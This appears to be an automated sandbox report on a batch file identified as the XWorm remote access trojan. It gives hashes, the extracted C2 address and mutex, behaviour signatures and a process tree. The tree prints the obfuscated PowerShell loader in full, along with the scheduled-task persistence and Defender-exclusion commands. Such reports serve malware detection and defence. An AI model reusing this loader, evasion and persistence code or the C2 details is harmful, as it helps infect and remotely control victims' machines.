Analysis

  • max time kernel
    89s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-04-2024 00:08

General

  • Target

    Freerubexgenpython.bat

  • Size

    268KB

  • MD5

    08e71b8265c7b98e17894abe76a5d2d5

  • SHA1

    e5ab42da766a21f3fbd268e18949d8faac06d44b

  • SHA256

    5187903da5fbbdb1cde09db8f9716f9b4196f36ef9788e77f4c51bc2087b5762

  • SHA512

    d7e174c2d088da25b15a5bf11879586137bfe37bda060f96cb303cf4fc031b03edebacc33008379a2839fcaca2d5882120fb40d839f8e903fe8a61674bffe851

  • SSDEEP

    6144:1ZM4WQySKAs2GF6zmiSbv/ZIsDUU1XkUp/q9PKrjh2uAJ:Q43ySXYGwUHUF8SR2j

Malware Config

Extracted

Family

xworm

Version

5.0

C2

maximum-meet.gl.at.ply.gg:1675

Mutex

wFaGwEoNy1MFwQqv

Attributes
  • Install_directory

    %Temp%

  • install_file

    RuntimeBroker.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Freerubexgenpython.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:4628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OMfU2O/sz3OM/dxd2x/oRWHtwta2mB/0Opg+Z1lWEW0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EN242PanCEqLXh62K3FbUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CiBhI=New-Object System.IO.MemoryStream(,$param_var); $eaDHU=New-Object System.IO.MemoryStream; $BbFJq=New-Object System.IO.Compression.GZipStream($CiBhI, [IO.Compression.CompressionMode]::Decompress); $BbFJq.CopyTo($eaDHU); $BbFJq.Dispose(); $CiBhI.Dispose(); $eaDHU.Dispose(); $eaDHU.ToArray();}function execute_function($param_var,$param2_var){ $FUVAc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HzYVf=$FUVAc.EntryPoint; $HzYVf.Invoke($null, $param2_var);}$CRArJ = 'C:\Users\Admin\AppData\Local\Temp\Freerubexgenpython.bat';$host.UI.RawUI.WindowTitle = $CRArJ;$WIcio=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CRArJ).Split([Environment]::NewLine);foreach ($nSrGG in $WIcio) { if ($nSrGG.StartsWith(':: ')) { $lwNuy=$nSrGG.Substring(3); break; }}$payloads_var=[string[]]$lwNuy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_558_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_558.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2340
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_558.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_558.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:3900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OMfU2O/sz3OM/dxd2x/oRWHtwta2mB/0Opg+Z1lWEW0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EN242PanCEqLXh62K3FbUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CiBhI=New-Object System.IO.MemoryStream(,$param_var); $eaDHU=New-Object System.IO.MemoryStream; $BbFJq=New-Object System.IO.Compression.GZipStream($CiBhI, [IO.Compression.CompressionMode]::Decompress); $BbFJq.CopyTo($eaDHU); $BbFJq.Dispose(); $CiBhI.Dispose(); $eaDHU.Dispose(); $eaDHU.ToArray();}function execute_function($param_var,$param2_var){ $FUVAc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HzYVf=$FUVAc.EntryPoint; $HzYVf.Invoke($null, $param2_var);}$CRArJ = 'C:\Users\Admin\AppData\Roaming\startup_str_558.bat';$host.UI.RawUI.WindowTitle = $CRArJ;$WIcio=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CRArJ).Split([Environment]::NewLine);foreach ($nSrGG in $WIcio) { if ($nSrGG.StartsWith(':: ')) { $lwNuy=$nSrGG.Substring(3); break; }}$payloads_var=[string[]]$lwNuy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1204
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4640
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1576
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'
                  6⤵
                    PID:1036
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
                    6⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4872
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
                    6⤵
                    • Creates scheduled task(s)
                    PID:4892
        • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
          C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
          1⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2564

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          5c0923e8e7765d761022bd427d59e9ca

          SHA1

          7490e1b19c5662e6339a68ba67920992dbfa3d33

          SHA256

          299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7

          SHA512

          a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          fd98baf5a9c30d41317663898985593b

          SHA1

          ea300b99f723d2429d75a6c40e0838bf60f17aad

          SHA256

          9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

          SHA512

          bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

        • C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5241qog0.mwe.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\startup_str_558.bat

          Filesize

          268KB

          MD5

          08e71b8265c7b98e17894abe76a5d2d5

          SHA1

          e5ab42da766a21f3fbd268e18949d8faac06d44b

          SHA256

          5187903da5fbbdb1cde09db8f9716f9b4196f36ef9788e77f4c51bc2087b5762

          SHA512

          d7e174c2d088da25b15a5bf11879586137bfe37bda060f96cb303cf4fc031b03edebacc33008379a2839fcaca2d5882120fb40d839f8e903fe8a61674bffe851

        • C:\Users\Admin\AppData\Roaming\startup_str_558.vbs

          Filesize

          115B

          MD5

          d0939b2b2c39c079cfcd65b0e19af436

          SHA1

          113857f6d6034bb77822e6f3197a46b0fa3520c9

          SHA256

          5349bbb4696f64aa8119e3e3f611f464478036ab5208a63c74c35dc4f22187b8

          SHA512

          367591771d8716a2ff545bed9a53b699fca2035e447a79a0227de8c79ce8668c42bca86dc60295ef1b383a02490685557d51df0e11876f51f0d67b7ac9f3a46b

        • memory/1204-49-0x000001ABA7200000-0x000001ABA7210000-memory.dmp

          Filesize

          64KB

        • memory/2340-30-0x00007FFF3DC10000-0x00007FFF3E6D1000-memory.dmp

          Filesize

          10.8MB

        • memory/2340-16-0x00007FFF3DC10000-0x00007FFF3E6D1000-memory.dmp

          Filesize

          10.8MB

        • memory/2340-17-0x00000214D0C90000-0x00000214D0CA0000-memory.dmp

          Filesize

          64KB

        • memory/2340-18-0x00000214D0C90000-0x00000214D0CA0000-memory.dmp

          Filesize

          64KB

        • memory/2564-98-0x000001EB5DF50000-0x000001EB5DF94000-memory.dmp

          Filesize

          272KB

        • memory/2564-99-0x000001EB61480000-0x000001EB614F6000-memory.dmp

          Filesize

          472KB

        • memory/4216-0-0x0000029966DA0000-0x0000029966DC2000-memory.dmp

          Filesize

          136KB

        • memory/4216-14-0x0000029966E20000-0x0000029966E54000-memory.dmp

          Filesize

          208KB

        • memory/4216-13-0x0000029966DF0000-0x0000029966DF8000-memory.dmp

          Filesize

          32KB

        • memory/4216-50-0x00007FFF3DC10000-0x00007FFF3E6D1000-memory.dmp

          Filesize

          10.8MB

        • memory/4216-11-0x0000029966E60000-0x0000029966E70000-memory.dmp

          Filesize

          64KB

        • memory/4216-12-0x0000029966E60000-0x0000029966E70000-memory.dmp

          Filesize

          64KB

        • memory/4216-10-0x00007FFF3DC10000-0x00007FFF3E6D1000-memory.dmp

          Filesize

          10.8MB